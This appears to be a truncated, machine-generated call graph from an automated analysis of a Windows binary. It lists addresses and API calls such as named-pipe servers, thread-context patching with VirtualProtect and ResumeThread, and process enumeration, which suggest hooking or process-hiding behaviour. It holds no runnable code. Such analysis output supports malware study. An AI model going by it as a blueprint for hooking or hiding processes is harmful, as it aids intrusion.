2d8b0a6c235 9784->9785 9786 2d8b0a6d8f0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9784->9786 9787 2d8b0a6c25e 9786->9787 8149 1400036f4 8150 140003701 8149->8150 8152 140003721 ConnectNamedPipe 8150->8152 8153 140003716 Sleep 8150->8153 8160 140002300 AllocateAndInitializeSid 8150->8160 8154 14000377f Sleep 8152->8154 8155 140003730 ReadFile 8152->8155 8153->8150 8157 14000378a DisconnectNamedPipe 8154->8157 8156 140003753 8155->8156 8155->8157 8159 140003190 31 API calls 8156->8159 8157->8152 8158 140003759 WriteFile 8158->8157 8159->8158 8161 14000241b 8160->8161 8162 14000235d SetEntriesInAclW 8160->8162 8161->8150 8162->8161 8163 1400023a1 LocalAlloc 8162->8163 8163->8161 8164 1400023b5 InitializeSecurityDescriptor 8163->8164 8164->8161 8165 1400023c5 SetSecurityDescriptorDacl 8164->8165 8165->8161 8166 1400023dc CreateNamedPipeW 8165->8166 8166->8161 9086 2d8b0a76015 9087 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9086->9087 9088 2d8b0a7602d 9087->9088 9089 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9088->9089 9090 2d8b0a76048 9089->9090 9091 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9090->9091 9092 2d8b0a7605c 9091->9092 9093 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9092->9093 9094 2d8b0a7609e 9093->9094 8243 2d8b0a6e094 8244 2d8b0a6e0ca 8243->8244 8245 2d8b0a6e099 RtlDeleteBoundaryDescriptor 8243->8245 8245->8244 8246 2d8b0a6e0b4 GetLastError 8245->8246 8247 2d8b0a6e0c1 Concurrency::details::SchedulerProxy::DeleteThis 8246->8247 8249 2d8b0a6dffc 8247->8249 8252 2d8b0a6d8f0 GetLastError 8249->8252 8251 2d8b0a6e005 8251->8244 8253 2d8b0a6d914 8252->8253 8254 2d8b0a6d931 FlsSetValue 8252->8254 8253->8254 8266 2d8b0a6d921 SetLastError 8253->8266 8255 2d8b0a6d943 8254->8255 8254->8266 8269 2d8b0a6e01c 8255->8269 8258 2d8b0a6d952 8259 2d8b0a6d970 FlsSetValue 8258->8259 8260 2d8b0a6d960 FlsSetValue 8258->8260 8261 2d8b0a6d98e 8259->8261 8262 2d8b0a6d97c FlsSetValue 8259->8262 8263 2d8b0a6d969 8260->8263 8282 2d8b0a6d4e4 8261->8282 8262->8263 8276 2d8b0a6e094 8263->8276 8266->8251 8274 2d8b0a6e02d _invalid_parameter_noinfo 8269->8274 8270 2d8b0a6e062 HeapAlloc 8272 2d8b0a6e07c 8270->8272 8270->8274 8271 2d8b0a6e07e 8273 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 10 API calls 8271->8273 8272->8258 8273->8272 8274->8270 8274->8271 8287 2d8b0a6c1ac 8274->8287 8277 2d8b0a6e0ca 8276->8277 8278 2d8b0a6e099 RtlDeleteBoundaryDescriptor 8276->8278 8277->8266 8278->8277 8279 2d8b0a6e0b4 GetLastError 8278->8279 8280 2d8b0a6e0c1 Concurrency::details::SchedulerProxy::DeleteThis 8279->8280 8281 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 9 API calls 8280->8281 8281->8277 8296 2d8b0a6d3bc 8282->8296 8290 2d8b0a6c1ec 8287->8290 8295 2d8b0a6d2ec EnterCriticalSection 8290->8295 8308 2d8b0a6d2ec EnterCriticalSection 8296->8308 8791 2d8b0a66093 8792 2d8b0a660a0 8791->8792 8793 2d8b0a660ac GetThreadContext 8792->8793 8798 2d8b0a6620a 8792->8798 8794 2d8b0a660d2 8793->8794 8793->8798 8794->8798 8800 2d8b0a660f9 8794->8800 8795 2d8b0a662ee 8797 2d8b0a6630e 8795->8797 8809 2d8b0a647d0 8795->8809 8796 2d8b0a66231 VirtualProtect FlushInstructionCache 8796->8798 8813 2d8b0a651e0 GetCurrentProcess 8797->8813 8798->8795 8798->8796 8799 2d8b0a6617d 8800->8799 8804 2d8b0a66156 SetThreadContext 8800->8804 8802 2d8b0a66313 8805 2d8b0a66367 8802->8805 8806 2d8b0a66327 ResumeThread 8802->8806 8804->8799 8807 2d8b0a67d30 _log10_special 8 API calls 8805->8807 8806->8802 8808 2d8b0a663af 8807->8808 8810 2d8b0a647ec 8809->8810 8811 2d8b0a6484f 8810->8811 8812 2d8b0a64802 VirtualFree 8810->8812 8811->8797 8812->8810 8814 2d8b0a651fc 8813->8814 8815 2d8b0a65212 VirtualProtect FlushInstructionCache 8814->8815 8816 2d8b0a65243 8814->8816 8815->8814 8816->8802 8817 2d8b0a63090 8819 2d8b0a630c0 8817->8819 8818 2d8b0a63179 8819->8818 8820 2d8b0a630dd PdhGetCounterInfoW 8819->8820 8820->8818 8821 2d8b0a630fb GetProcessHeap HeapAlloc PdhGetCounterInfoW 8820->8821 8822 2d8b0a6312d StrCmpW 8821->8822 8823 2d8b0a63165 GetProcessHeap HeapFree 8821->8823 8822->8823 8825 2d8b0a63142 8822->8825 8823->8818 8825->8823 8826 2d8b0a63520 StrCmpNW 8825->8826 8827 2d8b0a635c2 8826->8827 8828 2d8b0a63552 StrStrW 8826->8828 8827->8825 8828->8827 8829 2d8b0a6356b StrToIntW 8828->8829 8829->8827 8830 2d8b0a63593 8829->8830 8830->8827 8836 2d8b0a6193c OpenProcess 8830->8836 8837 2d8b0a619c2 8836->8837 8838 2d8b0a61970 K32GetModuleFileNameExW 8836->8838 8837->8827 8842 2d8b0a63c40 8837->8842 8839 2d8b0a6198a PathFindFileNameW lstrlenW 8838->8839 8840 2d8b0a619b9 CloseHandle 8838->8840 8839->8840 8841 2d8b0a619a8 StrCpyW 8839->8841 8840->8837 8841->8840 8843 2d8b0a63c4d StrCmpNIW 8842->8843 8844 2d8b0a635b4 8842->8844 8843->8844 8844->8827 8845 2d8b0a61c08 8844->8845 8846 2d8b0a61c1f 8845->8846 8847 2d8b0a61c28 8845->8847 8849 2d8b0a61534 8846->8849 8847->8827 8850 2d8b0a6154e 8849->8850 8853 2d8b0a61584 8849->8853 8851 2d8b0a6156d StrCmpW 8850->8851 8852 2d8b0a61565 StrCmpIW 8850->8852 8850->8853 8851->8850 8852->8850 8853->8847 8854 2d8b0a71490 8855 2d8b0a714bd 8854->8855 8856 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8855->8856 8860 2d8b0a714d2 8855->8860 8857 2d8b0a714c7 8856->8857 8858 2d8b0a6dec0 _invalid_parameter_noinfo 49 API calls 8857->8858 8858->8860 8859 2d8b0a67d30 _log10_special 8 API calls 8861 2d8b0a71890 8859->8861 8860->8859 9497 2d8b0a70590 9498 2d8b0a705c0 9497->9498 9500 2d8b0a705e7 9497->9500 9499 2d8b0a6d8f0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9498->9499 9498->9500 9505 2d8b0a705d4 9498->9505 9499->9505 9501 2d8b0a706bc 9500->9501 9520 2d8b0a6d2ec EnterCriticalSection 9500->9520 9504 2d8b0a707f0 9501->9504 9513 2d8b0a706ea 9501->9513 9516 2d8b0a70723 9501->9516 9502 2d8b0a70624 9508 2d8b0a707fd 9504->9508 9522 2d8b0a6d340 LeaveCriticalSection 9504->9522 9505->9500 9505->9502 9506 2d8b0a70669 9505->9506 9509 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9506->9509 9507 2d8b0a70781 9519 2d8b0a6d778 23 API calls _invalid_parameter_noinfo 9507->9519 9512 2d8b0a7066e 9509->9512 9514 2d8b0a6dec0 _invalid_parameter_noinfo 49 API calls 9512->9514 9515 2d8b0a6d778 _invalid_parameter_noinfo 23 API calls 9513->9515 9513->9516 9514->9502 9517 2d8b0a70713 9515->9517 9516->9507 9521 2d8b0a6d340 LeaveCriticalSection 9516->9521 9518 2d8b0a6d778 _invalid_parameter_noinfo 23 API calls 9517->9518 9518->9516 9519->9507 9526 2d8b0a71990 9527 2d8b0a719af 9526->9527 9528 2d8b0a71a28 9527->9528 9531 2d8b0a719bf 9527->9531 9534 2d8b0a685dc 9528->9534 9532 2d8b0a67d30 _log10_special 8 API calls 9531->9532 9533 2d8b0a71a1e 9532->9533 9537 2d8b0a685f0 IsProcessorFeaturePresent 9534->9537 9538 2d8b0a68607 9537->9538 9543 2d8b0a6868c RtlCaptureContext RtlLookupFunctionEntry 9538->9543 9544 2d8b0a6861b 9543->9544 9545 2d8b0a686bc RtlVirtualUnwind 9543->9545 9546 2d8b0a684d4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9544->9546 9545->9544 9788 2d8b0a760dd 9789 2d8b0a6a3f4 __CxxCallCatchBlock 9 API calls 9788->9789 9792 2d8b0a760f0 9789->9792 9790 2d8b0a7612f __CxxCallCatchBlock 9791 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9790->9791 9793 2d8b0a76143 9791->9793 9792->9790 9795 2d8b0a68cb8 __CxxCallCatchBlock 9 API calls 9792->9795 9794 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9793->9794 9796 2d8b0a76153 9794->9796 9795->9790 9095 2d8b0a703dc 9098 2d8b0a703e8 9095->9098 9097 2d8b0a7040f 9098->9097 9099 2d8b0a7260c 9098->9099 9100 2d8b0a7264c 9099->9100 9101 2d8b0a72611 9099->9101 9100->9098 9102 2d8b0a72644 9101->9102 9103 2d8b0a72632 DeleteCriticalSection 9101->9103 9104 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9102->9104 9103->9102 9103->9103 9104->9100 9797 2d8b0a6cedc 9798 2d8b0a6cef5 9797->9798 9799 2d8b0a6cf0d 9797->9799 9798->9799 9800 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9798->9800 9800->9799 9801 2d8b0a70cd8 9802 2d8b0a70ce3 9801->9802 9810 2d8b0a735d8 9802->9810 9823 2d8b0a6d2ec EnterCriticalSection 9810->9823 9824 2d8b0a6bae6 9825 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9824->9825 9827 2d8b0a6baf3 __CxxCallCatchBlock 9825->9827 9826 2d8b0a6bb37 RaiseException 9828 2d8b0a6bb5e 9826->9828 9827->9826 9829 2d8b0a6a3f4 __CxxCallCatchBlock 9 API calls 9828->9829 9833 2d8b0a6bb66 9829->9833 9830 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9831 2d8b0a6bba2 9830->9831 9832 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9831->9832 9834 2d8b0a6bbab 9832->9834 9835 2d8b0a68cb8 __CxxCallCatchBlock 9 API calls 9833->9835 9836 2d8b0a6bb8f __CxxCallCatchBlock 9833->9836 9835->9836 9836->9830 9837 2d8b0a620e4 9838 2d8b0a62115 9837->9838 9839 2d8b0a621f6 9838->9839 9840 2d8b0a6222b 9838->9840 9846 2d8b0a62139 9838->9846 9841 2d8b0a6229f 9840->9841 9842 2d8b0a62230 9840->9842 9841->9839 9845 2d8b0a63198 11 API calls 9841->9845 9854 2d8b0a63198 GetProcessHeap HeapAlloc 9842->9854 9844 2d8b0a62171 StrCmpNIW 9844->9846 9845->9839 9846->9839 9846->9844 9848 2d8b0a61c3c 9846->9848 9849 2d8b0a61c63 GetProcessHeap HeapAlloc 9848->9849 9850 2d8b0a61cc0 9848->9850 9849->9850 9851 2d8b0a61c9e 9849->9851 9850->9846 9852 2d8b0a61c08 2 API calls 9851->9852 9853 2d8b0a61ca6 GetProcessHeap HeapFree 9852->9853 9853->9850 9857 2d8b0a631eb 9854->9857 9855 2d8b0a632a9 GetProcessHeap HeapFree 9855->9839 9856 2d8b0a632a4 9856->9855 9857->9855 9857->9856 9858 2d8b0a63236 StrCmpNIW 9857->9858 9859 2d8b0a61c3c 6 API calls 9857->9859 9858->9857 9859->9857 9551 2d8b0a76163 9554 2d8b0a68d0c 9551->9554 9555 2d8b0a68d36 9554->9555 9556 2d8b0a68d24 9554->9556 9557 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9555->9557 9556->9555 9558 2d8b0a68d2c 9556->9558 9559 2d8b0a68d3b 9557->9559 9560 2d8b0a68d34 9558->9560 9561 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9558->9561 9559->9560 9562 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9559->9562 9563 2d8b0a68d5b 9561->9563 9562->9560 9564 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9563->9564 9565 2d8b0a68d68 9564->9565 9566 2d8b0a6cff8 23 API calls 9565->9566 9567 2d8b0a68d71 9566->9567 9568 2d8b0a6cff8 23 API calls 9567->9568 9569 2d8b0a68d7d 9568->9569 9860 2d8b0a660e0 9861 2d8b0a660ed 9860->9861 9862 2d8b0a660f9 9861->9862 9867 2d8b0a6620a 9861->9867 9863 2d8b0a6617d 9862->9863 9864 2d8b0a66156 SetThreadContext 9862->9864 9864->9863 9865 2d8b0a662ee 9868 2d8b0a6630e 9865->9868 9870 2d8b0a647d0 VirtualFree 9865->9870 9866 2d8b0a66231 VirtualProtect FlushInstructionCache 9866->9867 9867->9865 9867->9866 9869 2d8b0a651e0 3 API calls 9868->9869 9873 2d8b0a66313 9869->9873 9870->9868 9871 2d8b0a66367 9874 2d8b0a67d30 _log10_special 8 API calls 9871->9874 9872 2d8b0a66327 ResumeThread 9872->9873 9873->9871 9873->9872 9875 2d8b0a663af 9874->9875 9105 2d8b0a683ec 9108 2d8b0a68d80 9105->9108 9107 2d8b0a68415 9109 2d8b0a68da1 9108->9109 9110 2d8b0a68dd6 __vcrt_freefls 9108->9110 9109->9110 9112 2d8b0a6d038 9109->9112 9110->9107 9113 2d8b0a6d045 9112->9113 9114 2d8b0a6d04f 9112->9114 9113->9114 9119 2d8b0a6d06a 9113->9119 9115 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9114->9115 9116 2d8b0a6d056 9115->9116 9117 2d8b0a6dec0 _invalid_parameter_noinfo 49 API calls 9116->9117 9118 2d8b0a6d062 9117->9118 9118->9110 9119->9118 9120 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9119->9120 9120->9116 9121 2d8b0a6e3ec 9122 2d8b0a6e411 9121->9122 9130 2d8b0a6e428 9121->9130 9123 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9122->9123 9125 2d8b0a6e416 9123->9125 9124 2d8b0a6e4e0 9128 2d8b0a6c84c 11 API calls 9124->9128 9126 2d8b0a6dec0 _invalid_parameter_noinfo 49 API calls 9125->9126 9127 2d8b0a6e421 9126->9127 9129 2d8b0a6e538 9128->9129 9131 2d8b0a6e540 9129->9131 9141 2d8b0a6e572 9129->9141 9130->9124 9135 2d8b0a6e4b8 9130->9135 9138 2d8b0a6e475 9130->9138 9153 2d8b0a6e630 9130->9153 9133 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9131->9133 9136 2d8b0a6e547 9133->9136 9134 2d8b0a6e5d1 9137 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9134->9137 9139 2d8b0a6e498 9135->9139 9143 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9135->9143 9136->9139 9142 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9136->9142 9140 2d8b0a6e5dc 9137->9140 9138->9139 9146 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9138->9146 9145 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9139->9145 9144 2d8b0a6e5f5 9140->9144 9147 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9140->9147 9141->9134 9141->9141 9150 2d8b0a6e617 9141->9150 9175 2d8b0a718a0 9141->9175 9142->9136 9143->9135 9148 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9144->9148 9145->9127 9146->9138 9147->9140 9148->9127 9151 2d8b0a6dee0 _invalid_parameter_noinfo 17 API calls 9150->9151 9152 2d8b0a6e62c 9151->9152 9154 2d8b0a6e65e 9153->9154 9154->9154 9155 2d8b0a6e01c _invalid_parameter_noinfo 11 API calls 9154->9155 9156 2d8b0a6e6a9 9155->9156 9157 2d8b0a718a0 49 API calls 9156->9157 9158 2d8b0a6e6df 9157->9158 9159 2d8b0a6dee0 _invalid_parameter_noinfo 17 API calls 9158->9159 9160 2d8b0a6e7b3 9159->9160 9161 2d8b0a6eb04 23 API calls 9160->9161 9162 2d8b0a6e896 9161->9162 9163 2d8b0a6fef8 5 API calls 9162->9163 9164 2d8b0a6e8c1 9163->9164 9184 2d8b0a6e0e4 9164->9184 9167 2d8b0a6e95d 9168 2d8b0a6eb04 23 API calls 9167->9168 9169 2d8b0a6e98d 9168->9169 9170 2d8b0a6fef8 5 API calls 9169->9170 9171 2d8b0a6e9b6 9170->9171 9206 2d8b0a6e260 9171->9206 9174 2d8b0a6e630 59 API calls 9180 2d8b0a718bd 9175->9180 9176 2d8b0a718c2 9177 2d8b0a718d8 9176->9177 9178 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9176->9178 9177->9141 9179 2d8b0a718cc 9178->9179 9181 2d8b0a6dec0 _invalid_parameter_noinfo 49 API calls 9179->9181 9180->9176 9180->9177 9182 2d8b0a7190c 9180->9182 9181->9177 9182->9177 9183 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9182->9183 9183->9179 9185 2d8b0a6e10e 9184->9185 9186 2d8b0a6e132 9184->9186 9190 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9185->9190 9195 2d8b0a6e11d FindFirstFileExW 9185->9195 9187 2d8b0a6e18c 9186->9187 9188 2d8b0a6e137 9186->9188 9189 2d8b0a6f9cc MultiByteToWideChar 9187->9189 9191 2d8b0a6e14c 9188->9191 9192 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9188->9192 9188->9195 9198 2d8b0a6e1a8 9189->9198 9190->9195 9193 2d8b0a6d35c 12 API calls 9191->9193 9192->9191 9193->9195 9194 2d8b0a6e1af GetLastError 9197 2d8b0a6df70 11 API calls 9194->9197 9195->9167 9196 2d8b0a6e1ea 9196->9195 9200 2d8b0a6f9cc MultiByteToWideChar 9196->9200 9201 2d8b0a6e1bc 9197->9201 9198->9194 9198->9196 9199 2d8b0a6e1dd 9198->9199 9203 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9198->9203 9204 2d8b0a6d35c 12 API calls 9199->9204 9205 2d8b0a6e22e 9200->9205 9202 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9201->9202 9202->9195 9203->9199 9204->9196 9205->9194 9205->9195 9207 2d8b0a6e2ae 9206->9207 9208 2d8b0a6e28a 9206->9208 9209 2d8b0a6e308 9207->9209 9210 2d8b0a6e2b4 9207->9210 9212 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9208->9212 9215 2d8b0a6e299 9208->9215 9211 2d8b0a6fa5c WideCharToMultiByte 9209->9211 9213 2d8b0a6e2c9 9210->9213 9210->9215 9216 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9210->9216 9222 2d8b0a6e32c 9211->9222 9212->9215 9217 2d8b0a6d35c 12 API calls 9213->9217 9214 2d8b0a6e333 GetLastError 9218 2d8b0a6df70 11 API calls 9214->9218 9215->9174 9216->9213 9217->9215 9221 2d8b0a6e340 9218->9221 9219 2d8b0a6e370 9219->9215 9220 2d8b0a6fa5c WideCharToMultiByte 9219->9220 9225 2d8b0a6e3bc 9220->9225 9226 2d8b0a6dffc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9221->9226 9222->9214 9222->9219 9223 2d8b0a6e364 9222->9223 9227 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9222->9227 9224 2d8b0a6d35c 12 API calls 9223->9224 9224->9219 9225->9214 9225->9215 9226->9215 9227->9223 9228 2d8b0a6b9ec 9229 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9228->9229 9230 2d8b0a6ba21 9229->9230 9231 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9230->9231 9232 2d8b0a6ba2f __except_validate_context_record 9231->9232 9233 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9232->9233 9234 2d8b0a6ba73 9233->9234 9235 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9234->9235 9236 2d8b0a6ba7c 9235->9236 9237 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9236->9237 9238 2d8b0a6ba85 9237->9238 9251 2d8b0a6a3b8 9238->9251 9241 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9242 2d8b0a6bab5 __CxxCallCatchBlock 9241->9242 9258 2d8b0a6a3f4 9242->9258 9244 2d8b0a6bb8f __CxxCallCatchBlock 9245 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9244->9245 9246 2d8b0a6bba2 9245->9246 9247 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9246->9247 9249 2d8b0a6bbab 9247->9249 9252 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9251->9252 9253 2d8b0a6a3c9 9252->9253 9254 2d8b0a6a3d4 9253->9254 9255 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9253->9255 9256 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9254->9256 9255->9254 9257 2d8b0a6a3e5 9256->9257 9257->9241 9257->9242 9259 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9258->9259 9260 2d8b0a6a406 9259->9260 9261 2d8b0a6a441 9260->9261 9262 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9260->9262 9263 2d8b0a6a411 9262->9263 9263->9261 9264 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9263->9264 9265 2d8b0a6a432 9264->9265 9265->9244 9266 2d8b0a68cb8 9265->9266 9267 2d8b0a68fe4 __CxxCallCatchBlock 9 API calls 9266->9267 9268 2d8b0a68cc6 9267->9268 9268->9244 9876 2d8b0a746e8 9877 2d8b0a746ff 9876->9877 9878 2d8b0a746f9 CloseHandle 9876->9878 9878->9877 9269 2d8b0a723f0 9270 2d8b0a6f5e0 69 API calls 9269->9270 9271 2d8b0a723f9 9270->9271 9879 2d8b0a62b3c 9881 2d8b0a62b99 9879->9881 9880 2d8b0a62bb4 9881->9880 9882 2d8b0a63478 3 API calls 9881->9882 9882->9880 9883 2d8b0a6593d 9885 2d8b0a65944 9883->9885 9884 2d8b0a659ab 9885->9884 9886 2d8b0a65a27 VirtualProtect 9885->9886 9887 2d8b0a65a53 GetLastError 9886->9887 9888 2d8b0a65a61 9886->9888 9887->9888 9889 2d8b0a7013c 9890 2d8b0a70175 9889->9890 9892 2d8b0a70146 9889->9892 9891 2d8b0a7015b FreeLibrary 9891->9892 9892->9890 9892->9891 8862 2d8b0a760b8 8865 2d8b0a6bbd8 8862->8865 8866 2d8b0a6bbf2 8865->8866 8868 2d8b0a6bc3f 8865->8868 8866->8868 8869 2d8b0a68fe4 8866->8869 8872 2d8b0a69000 8869->8872 8871 2d8b0a68fed 8871->8868 8873 2d8b0a6901f GetLastError 8872->8873 8874 2d8b0a69018 8872->8874 8884 2d8b0a6a708 8873->8884 8874->8871 8888 2d8b0a6a528 8884->8888 8889 2d8b0a6a612 TlsGetValue 8888->8889 8895 2d8b0a6a56c __vcrt_FlsAlloc 8888->8895 8890 2d8b0a6a59a LoadLibraryExW 8892 2d8b0a6a5bb GetLastError 8890->8892 8893 2d8b0a6a639 8890->8893 8891 2d8b0a6a659 GetProcAddress 8891->8889 8892->8895 8893->8891 8894 2d8b0a6a650 FreeLibrary 8893->8894 8894->8891 8895->8889 8895->8890 8895->8891 8896 2d8b0a6a5dd LoadLibraryExW 8895->8896 8896->8893 8896->8895 9570 2d8b0a70bb8 9571 2d8b0a70be2 9570->9571 9572 2d8b0a6e01c _invalid_parameter_noinfo 11 API calls 9571->9572 9573 2d8b0a70c01 9572->9573 9574 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9573->9574 9575 2d8b0a70c0f 9574->9575 9576 2d8b0a6e01c _invalid_parameter_noinfo 11 API calls 9575->9576 9580 2d8b0a70c39 9575->9580 9577 2d8b0a70c2b 9576->9577 9579 2d8b0a6e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9577->9579 9578 2d8b0a6ff5c 6 API calls 9578->9580 9579->9580 9580->9578 9581 2d8b0a70c42 9580->9581 9272 2d8b0a76245 9273 2d8b0a7625e 9272->9273 9274 2d8b0a76254 9272->9274 9276 2d8b0a6d340 LeaveCriticalSection 9274->9276 8897 2d8b0a6c4c1 8909 2d8b0a6cff8 8897->8909 8910 2d8b0a6d778 _invalid_parameter_noinfo 23 API calls 8909->8910 8911 2d8b0a6d001 8910->8911 9582 2d8b0a623c0 9583 2d8b0a6243e _invalid_parameter_noinfo 9582->9583 9584 2d8b0a624a3 GetFileType 9583->9584 9590 2d8b0a6255b 9583->9590 9585 2d8b0a624c5 9584->9585 9586 2d8b0a624b1 StrCpyW 9584->9586 9593 2d8b0a619e0 GetFinalPathNameByHandleW 9585->9593 9591 2d8b0a624d2 9586->9591 9588 2d8b0a63c40 StrCmpNIW 9588->9591 9591->9588 9591->9590 9598 2d8b0a632d8 StrCmpIW 9591->9598 9602 2d8b0a61ce0 9591->9602 9594 2d8b0a61a0a StrCmpNIW 9593->9594 9595 2d8b0a61a49 9593->9595 9594->9595 9596 2d8b0a61a24 lstrlenW 9594->9596 9595->9591 9596->9595 9597 2d8b0a61a36 StrCpyW 9596->9597 9597->9595 9599 2d8b0a6330a StrCpyW StrCatW 9598->9599 9600 2d8b0a63321 PathCombineW 9598->9600 9601 2d8b0a6332a 9599->9601 9600->9601 9601->9591 9603 2d8b0a61d00 9602->9603 9604 2d8b0a61cf7 9602->9604 9603->9591 9605 2d8b0a61534 2 API calls 9604->9605 9605->9603 8310 140002cb0 8311 140002cbd 8310->8311 8312 140002300 6 API calls 8311->8312 8313 140002cd2 Sleep 8311->8313 8314 140002cdd ConnectNamedPipe 8311->8314 8312->8311 8313->8311 8315 140002d21 Sleep 8314->8315 8316 140002cec ReadFile 8314->8316 8317 140002d2c DisconnectNamedPipe 8315->8317 8316->8317 8318 140002d0f 8316->8318 8317->8314 8318->8317 9893 2d8b0a70540 9896 2d8b0a704f8 9893->9896 9901 2d8b0a6d2ec EnterCriticalSection 9896->9901 8912 2d8b0a67ecc 8919 2d8b0a68bf4 8912->8919 8918 2d8b0a67ed9 8920 2d8b0a69000 __CxxCallCatchBlock 9 API calls 8919->8920 8921 2d8b0a67ed5 8920->8921 8921->8918 8922 2d8b0a6cf8c 8921->8922 8923 2d8b0a6d8f0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8922->8923 8924 2d8b0a67ee2 8923->8924 8924->8918 8925 2d8b0a68c08 8924->8925 8928 2d8b0a68f9c 8925->8928 8927 2d8b0a68c11 8927->8918 8929 2d8b0a68fad 8928->8929 8930 2d8b0a68fc2 __vcrt_freefls 8928->8930 8931 2d8b0a6a708 __CxxCallCatchBlock 6 API calls 8929->8931 8930->8927 8932 2d8b0a68fb2 8931->8932 8934 2d8b0a6a750 8932->8934 8935 2d8b0a6a528 __vcrt_FlsAlloc 5 API calls 8934->8935 8936 2d8b0a6a77e 8935->8936 8937 2d8b0a6a788 8936->8937 8938 2d8b0a6a790 TlsSetValue 8936->8938 8937->8930 8938->8937 9606 2d8b0a625cc 9608 2d8b0a6264b _invalid_parameter_noinfo 9606->9608 9607 2d8b0a6277c 9608->9607 9609 2d8b0a626ad GetFileType 9608->9609 9610 2d8b0a626bb StrCpyW 9609->9610 9611 2d8b0a626d1 9609->9611 9613 2d8b0a626e0 9610->9613 9612 2d8b0a619e0 4 API calls 9611->9612 9612->9613 9616 2d8b0a62781 9613->9616 9620 2d8b0a626ea 9613->9620 9614 2d8b0a63c40 StrCmpNIW 9614->9616 9615 2d8b0a63c40 StrCmpNIW 9615->9620 9616->9607 9616->9614 9617 2d8b0a632d8 4 API calls 9616->9617 9618 2d8b0a61ce0 2 API calls 9616->9618 9617->9616 9618->9616 9619 2d8b0a632d8 4 API calls 9619->9620 9620->9607 9620->9615 9620->9619 9621 2d8b0a61ce0 2 API calls 9620->9621 9621->9620 9622 2d8b0a68bcc 9629 2d8b0a6912c 9622->9629 9626 2d8b0a68bd9 9630 2d8b0a69134 9629->9630 9632 2d8b0a69165 9630->9632 9634 2d8b0a68bd5 9630->9634 9646 2d8b0a6a7a4 9630->9646 9633 2d8b0a69174 __vcrt_uninitialize_locks DeleteCriticalSection 9632->9633 9633->9634 9634->9626 9635 2d8b0a690c0 9634->9635 9651 2d8b0a6a678 9635->9651 9647 2d8b0a6a528 __vcrt_FlsAlloc 5 API calls 9646->9647 9648 2d8b0a6a7da 9647->9648 9649 2d8b0a6a7ef InitializeCriticalSectionAndSpinCount 9648->9649 9650 2d8b0a6a7e4 9648->9650 9649->9650 9650->9630 9652 2d8b0a6a528 __vcrt_FlsAlloc 5 API calls 9651->9652 9653 2d8b0a6a69d TlsAlloc 9652->9653 8091 140003634 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8092 14000368a K32EnumProcesses 8091->8092 8093 1400036e7 SleepEx 8092->8093 8094 14000369f 8092->8094 8093->8092 8094->8093 8096 140003190 8094->8096 8097 1400031a1 8096->8097 8098 1400031c9 8096->8098 8102 140001868 OpenProcess 8097->8102 8098->8094 8101 